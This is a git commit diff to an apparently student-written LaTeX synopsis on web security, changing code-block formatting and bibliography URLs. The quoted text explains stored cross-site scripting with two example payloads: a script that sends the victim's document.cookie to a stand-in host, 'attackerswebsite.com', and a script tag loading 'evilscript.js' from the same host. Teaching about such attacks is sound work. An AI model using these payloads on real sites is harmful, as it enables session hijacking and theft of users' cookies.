aboutsummaryrefslogtreecommitdiff
diff options
context:
space:
mode:
authormarcinzelent <zelent.marcin@gmail.com>2018-05-26 18:49:20 +0200
committermarcinzelent <zelent.marcin@gmail.com>2018-05-26 18:49:20 +0200
commiteff77c82628eebfb59aef8ab0e212cb25a26e554 (patch)
tree8b475e1529f50692092d57e7ecc698419fa71ee8
parent313c9116d67956daf0c3db9d39eb4824f1613a08 (diff)
Fixed formatting
-rw-r--r--synopsis.pdfbin156299 -> 165241 bytes
-rw-r--r--synopsis.tex8
2 files changed, 4 insertions, 4 deletions
diff --git a/synopsis.pdf b/synopsis.pdf
index 428edc3..6b34d2b 100644
--- a/synopsis.pdf
+++ b/synopsis.pdf
Binary files differ
diff --git a/synopsis.tex b/synopsis.tex
index 36494d2..26814cb 100644
--- a/synopsis.tex
+++ b/synopsis.tex
@@ -439,7 +439,7 @@ example could be a comment on a forum, which contains Javascript code. If the
vulnerability is present, it will not be displayed on the page, but it will be
executed. It could be simple like:
-\begin{minted}{js}
+\begin{minted}{html}
<script>document.createElement('img').src = 'http://attackerswebsite.com/' +
document.cookie</script>
\end{minted}
@@ -448,7 +448,7 @@ This script would create an HTTP request to attacker's website with the victim's
cookies, which could contain for example very useful session token. It is also
possible to include much bigger scripts with:
-\begin{minted}{js}
+\begin{minted}{html}
<script src="http://attackerswebsite.com/evilscript.js"></script>
\end{minted}
@@ -602,13 +602,13 @@ end, I managed to finish my synopsis on time, so it is not a big issue.
\bibitem{sbd}
OWASP.
\textit{Security by Design Principles}.
- \texttt{https://www.owasp.org/index.php/\allowbreak{}
+ \texttt{https://owasp.org/index.php/\allowbreak{}
Security\_by\_Design\_Principles}
\bibitem{sdl}
Microsoft.
\textit{Security Development Lifecycle}.
- \texttt{https://www.microsoft.com/sdl}
+ \texttt{https://microsoft.com/sdl}
\end{thebibliography}